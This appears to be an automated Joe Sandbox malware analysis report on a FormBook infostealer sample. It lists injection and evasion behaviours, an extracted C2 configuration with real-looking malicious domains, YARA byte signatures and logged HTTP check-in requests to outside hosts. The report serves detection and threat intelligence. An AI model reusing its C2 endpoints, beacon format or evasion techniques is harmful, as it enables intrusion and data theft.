Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
i5NDVAFg42.exe

Overview

General Information

Sample name:i5NDVAFg42.exe
renamed because original name is a hash value
Original sample name:d0b94b855d2f24add1edf6b3a6ecae24e4366f181a1ccd0bcd3b27e94de95bc0.exe
Analysis ID:1410996
MD5:728b83244a275ef0e29cb00aa0c6692c
SHA1:8f744b5564e78ab054bc685bd12483c1ffd9de4d
SHA256:d0b94b855d2f24add1edf6b3a6ecae24e4366f181a1ccd0bcd3b27e94de95bc0
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • i5NDVAFg42.exe (PID: 3060 cmdline: C:\Users\user\Desktop\i5NDVAFg42.exe MD5: 728B83244A275EF0E29CB00AA0C6692C)
    • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • autochk.exe (PID: 4280 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: FC398299F54290D5F35C69E865FD7CC2)
      • ipconfig.exe (PID: 1772 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
        • cmd.exe (PID: 2792 cmdline: /c del "C:\Users\user\Desktop\i5NDVAFg42.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.yoursweets.online/vr01/"], "decoy": ["eclipsefoodservice.com", "oregonjobs.co", "ethicai.pro", "frontierconnects.co", "elcaporalburley.com", "exoticskinco.com", "topdeals.biz", "carmensbookstore.com", "mayorii.com", "viewhird.com", "bharatcrimecontrol24news.com", "sampleshubusa.com", "molobeverello.com", "nicholsonflooringservices.com", "kidscircle.shop", "771010.cc", "poseidoncrm.com", "liviafiorelli.com", "flavorfog.online", "xaqh.info", "bombslot-42.co", "floatshop.store", "massagechairspecialists.com", "mks-digital.net", "wti395.vip", "entelnegocio.com", "ansemgram.com", "owletbaby.shop", "skyhut.io", "kakevpn.com", "protectmichildren.net", "gratiasempirellc.com", "hsyxkj.com", "kirtirefrigeration.com", "makeyousurprise.com", "qqixe.shop", "svshop.us", "yesxoit.xyz", "jupitr-claim.top", "laneflowlogistics.com", "brandonbirk.com", "vjll.net", "maturak-na-klic.online", "mingshengglass.com", "theshopsatmaunalani.com", "accidentapp.online", "fertnow.com", "nicolbauer.com", "mym-agency.com", "efxprm.com", "studioenginedemo.com", "erabits.com", "chhpiyg.pro", "adadripdropz.com", "dropperdeals.com", "viphao200.com", "lasik-eye-surgery-45089.bond", "helyibudapest.com", "michellecaldwelldesign.com", "snugandkind.com", "redirect2-userweb.com", "pataltarghya.com", "tumi123ans.lol", "familyofficesheet.com"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
i5NDVAFg42.exeJoeSecurity_FormBookYara detected FormBookJoe Security
    i5NDVAFg42.exeJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      i5NDVAFg42.exeWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x5651:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1bfc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x9dcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x14cb7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      i5NDVAFg42.exeFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8d08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8f82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14ab5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x145a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14bb7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x14d2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x999a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1381c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa693:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1ad27:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1bd2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      i5NDVAFg42.exeFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x17c49:$sqlite3step: 68 34 1C 7B E1
      • 0x17d5c:$sqlite3step: 68 34 1C 7B E1
      • 0x17c78:$sqlite3text: 68 38 2A 90 C5
      • 0x17d9d:$sqlite3text: 68 38 2A 90 C5
      • 0x17c8b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x17db3:$sqlite3blob: 68 53 D8 7F 8C

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6421:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cd90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xab9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x15a87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9ad8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x15aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa76a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x145ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1baf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1cafa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18a19:$sqlite3step: 68 34 1C 7B E1
          • 0x18b2c:$sqlite3step: 68 34 1C 7B E1
          • 0x18a48:$sqlite3text: 68 38 2A 90 C5
          • 0x18b6d:$sqlite3text: 68 38 2A 90 C5
          • 0x18a5b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18b83:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 49 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.i5NDVAFg42.exe.ce0000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            0.2.i5NDVAFg42.exe.ce0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              0.2.i5NDVAFg42.exe.ce0000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
              • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
              • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
              • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
              • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
              0.2.i5NDVAFg42.exe.ce0000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
              • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
              • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
              • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
              • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
              • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
              • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
              • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
              • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
              • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
              0.2.i5NDVAFg42.exe.ce0000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
              • 0x17a49:$sqlite3step: 68 34 1C 7B E1
              • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
              • 0x17a78:$sqlite3text: 68 38 2A 90 C5
              • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
              • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
              • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
              Click to see the 5 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:03/18/24-14:45:01.182529
              SID:2031412
              Source Port:49716
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/18/24-14:43:58.800885
              SID:2031412
              Source Port:49713
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/18/24-14:45:21.823978
              SID:2031412
              Source Port:49717
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/18/24-14:45:42.018352
              SID:2031412
              Source Port:49718
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/18/24-14:43:40.128238
              SID:2031412
              Source Port:49712
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/18/24-14:44:20.094348
              SID:2031412
              Source Port:49715
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/18/24-14:46:45.274276
              SID:2031412
              Source Port:49720
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/18/24-14:46:05.770153
              SID:2031412
              Source Port:49719
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: i5NDVAFg42.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://www.yoursweets.online/vr01/www.nicholsonflooringservices.comAvira URL Cloud: Label: malware
              Source: http://www.yoursweets.onlineAvira URL Cloud: Label: malware
              Source: http://www.makeyousurprise.com/vr01/www.helyibudapest.comAvira URL Cloud: Label: phishing
              Source: http://www.yoursweets.online/vr01/Avira URL Cloud: Label: malware
              Source: www.yoursweets.online/vr01/Avira URL Cloud: Label: malware
              Source: http://www.makeyousurprise.comAvira URL Cloud: Label: phishing
              Source: http://www.makeyousurprise.com/vr01/Avira URL Cloud: Label: phishing
              Found malware configuration
              Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.yoursweets.online/vr01/"], "decoy": ["eclipsefoodservice.com", "oregonjobs.co", "ethicai.pro", "frontierconnects.co", "elcaporalburley.com", "exoticskinco.com", "topdeals.biz", "carmensbookstore.com", "mayorii.com", "viewhird.com", "bharatcrimecontrol24news.com", "sampleshubusa.com", "molobeverello.com", "nicholsonflooringservices.com", "kidscircle.shop", "771010.cc", "poseidoncrm.com", "liviafiorelli.com", "flavorfog.online", "xaqh.info", "bombslot-42.co", "floatshop.store", "massagechairspecialists.com", "mks-digital.net", "wti395.vip", "entelnegocio.com", "ansemgram.com", "owletbaby.shop", "skyhut.io", "kakevpn.com", "protectmichildren.net", "gratiasempirellc.com", "hsyxkj.com", "kirtirefrigeration.com", "makeyousurprise.com", "qqixe.shop", "svshop.us", "yesxoit.xyz", "jupitr-claim.top", "laneflowlogistics.com", "brandonbirk.com", "vjll.net", "maturak-na-klic.online", "mingshengglass.com", "theshopsatmaunalani.com", "accidentapp.online", "fertnow.com", "nicolbauer.com", "mym-agency.com", "efxprm.com", "studioenginedemo.com", "erabits.com", "chhpiyg.pro", "adadripdropz.com", "dropperdeals.com", "viphao200.com", "lasik-eye-surgery-45089.bond", "helyibudapest.com", "michellecaldwelldesign.com", "snugandkind.com", "redirect2-userweb.com", "pataltarghya.com", "tumi123ans.lol", "familyofficesheet.com"]}
              Multi AV Scanner detection for submitted file
              Source: i5NDVAFg42.exeReversingLabs: Detection: 89%
              Yara detected FormBook
              Source: Yara matchFile source: i5NDVAFg42.exe, type: SAMPLE
              Source: Yara matchFile source: 0.2.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Machine Learning detection for sample
              Source: i5NDVAFg42.exeJoe Sandbox ML: detected
              Source: i5NDVAFg42.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: i5NDVAFg42.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: ipconfig.pdb source: i5NDVAFg42.exe, 00000000.00000003.2044767474.0000000001245000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046841117.0000000001AD0000.00000040.10000000.00040000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000003.2044525388.000000000123F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4446909589.0000000000A90000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: ipconfig.pdbGCTL source: i5NDVAFg42.exe, 00000000.00000003.2044767474.0000000001245000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046841117.0000000001AD0000.00000040.10000000.00040000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000003.2044525388.000000000123F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4446909589.0000000000A90000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: i5NDVAFg42.exe, 00000000.00000003.1987282372.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000003.1989066813.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046523999.00000000018EE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4447883047.0000000003ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4447883047.0000000003930000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.2045464190.00000000035D9000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.2047562962.0000000003780000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: i5NDVAFg42.exe, i5NDVAFg42.exe, 00000000.00000003.1987282372.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000003.1989066813.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046523999.00000000018EE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000004.00000002.4447883047.0000000003ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4447883047.0000000003930000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.2045464190.00000000035D9000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.2047562962.0000000003780000.00000004.00000020.00020000.00000000.sdmp

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 45.88.201.15:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49713 -> 76.223.105.230:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 104.16.36.105:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49716 -> 35.214.118.179:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 69.57.172.11:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 34.149.87.45:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 72.14.185.43:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 3.33.130.190:80
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\explorer.exeNetwork Connect: 76.223.105.230 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 45.88.201.15 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 104.16.36.105 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 35.214.118.179 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 34.149.87.45 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 69.57.172.11 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 72.14.185.43 80Jump to behavior
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: www.yoursweets.online/vr01/
              Source: global trafficHTTP traffic detected: GET /vr01/?F8=w7umpJ+rfj3CGTpHxtSOPW9QQGzAdMNJjdAKE5hb1nYkCdk9PPEgcDhma/h12TSv3owP&K0Dl=8pkho2W8C2 HTTP/1.1Host: www.gratiasempirellc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /vr01/?K0Dl=8pkho2W8C2&F8=afsJSrVtQy935SgvDMKIlJRgvlqACV7EhITZbFrNAvlElQGaJzKQmMA6gaTM16h48AiD HTTP/1.1Host: www.laneflowlogistics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /vr01/?F8=kCWTp1EUleadtFJdIzCu6Df5MNzEbmwToUUw4IkBm959jVVvzkoQYbPRGEEyl/3/RaO8&K0Dl=8pkho2W8C2 HTTP/1.1Host: www.familyofficesheet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /vr01/?F8=Qr63XqLLwL8kZKZ1R+KG3ClgUrm6jRe21pOgDYnjKSMcuwj3QpCJccHr2dssKI7zl3t9&K0Dl=8pkho2W8C2 HTTP/1.1Host: www.flavorfog.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /vr01/?K0Dl=8pkho2W8C2&F8=3hn83+NBBYNXWUD9Y/r7Xs4IAViW+ZrQ9Q/N09yYT452ZMDcSpE7Ef8yOdRKd9g47dJA HTTP/1.1Host: www.bharatcrimecontrol24news.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /vr01/?F8=0FWlSxHnm0VS79clrGeEzlQTpbLPYM717ItFtF8k1xbK31xxaWzDAorSZVSnHMmj/6/I&K0Dl=8pkho2W8C2 HTTP/1.1Host: www.kirtirefrigeration.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /vr01/?K0Dl=8pkho2W8C2&F8=nF7lN0R+GAMQz/Akw9zAFS8sK1vaMqXOBBmwCvkEKDYNrGKPEkcEeMds11lXmHU70D3D HTTP/1.1Host: www.topdeals.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /vr01/?K0Dl=8pkho2W8C2&F8=XJpxajiERfwYWZCBMKFPnJULtBnU/CqQJGR7CZrrgovMO9KS90T7etXRllYWrqB0ffTS HTTP/1.1Host: www.accidentapp.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: Joe Sandbox ViewIP Address: 76.223.105.230 76.223.105.230
              Source: Joe Sandbox ViewIP Address: 76.223.105.230 76.223.105.230
              Source: Joe Sandbox ViewIP Address: 34.149.87.45 34.149.87.45
              Source: Joe Sandbox ViewASN Name: GOOGLE-2US GOOGLE-2US
              Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
              Source: Joe Sandbox ViewASN Name: DMITUS DMITUS
              Source: Joe Sandbox ViewASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\explorer.exeCode function: 2_2_0E4D3F82 getaddrinfo,setsockopt,recv,2_2_0E4D3F82
              Source: global trafficHTTP traffic detected: GET /vr01/?F8=w7umpJ+rfj3CGTpHxtSOPW9QQGzAdMNJjdAKE5hb1nYkCdk9PPEgcDhma/h12TSv3owP&K0Dl=8pkho2W8C2 HTTP/1.1Host: www.gratiasempirellc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /vr01/?K0Dl=8pkho2W8C2&F8=afsJSrVtQy935SgvDMKIlJRgvlqACV7EhITZbFrNAvlElQGaJzKQmMA6gaTM16h48AiD HTTP/1.1Host: www.laneflowlogistics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /vr01/?F8=kCWTp1EUleadtFJdIzCu6Df5MNzEbmwToUUw4IkBm959jVVvzkoQYbPRGEEyl/3/RaO8&K0Dl=8pkho2W8C2 HTTP/1.1Host: www.familyofficesheet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /vr01/?F8=Qr63XqLLwL8kZKZ1R+KG3ClgUrm6jRe21pOgDYnjKSMcuwj3QpCJccHr2dssKI7zl3t9&K0Dl=8pkho2W8C2 HTTP/1.1Host: www.flavorfog.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /vr01/?K0Dl=8pkho2W8C2&F8=3hn83+NBBYNXWUD9Y/r7Xs4IAViW+ZrQ9Q/N09yYT452ZMDcSpE7Ef8yOdRKd9g47dJA HTTP/1.1Host: www.bharatcrimecontrol24news.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /vr01/?F8=0FWlSxHnm0VS79clrGeEzlQTpbLPYM717ItFtF8k1xbK31xxaWzDAorSZVSnHMmj/6/I&K0Dl=8pkho2W8C2 HTTP/1.1Host: www.kirtirefrigeration.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /vr01/?K0Dl=8pkho2W8C2&F8=nF7lN0R+GAMQz/Akw9zAFS8sK1vaMqXOBBmwCvkEKDYNrGKPEkcEeMds11lXmHU70D3D HTTP/1.1Host: www.topdeals.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /vr01/?K0Dl=8pkho2W8C2&F8=XJpxajiERfwYWZCBMKFPnJULtBnU/CqQJGR7CZrrgovMO9KS90T7etXRllYWrqB0ffTS HTTP/1.1Host: www.accidentapp.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: unknownDNS traffic detected: queries for: www.gratiasempirellc.com
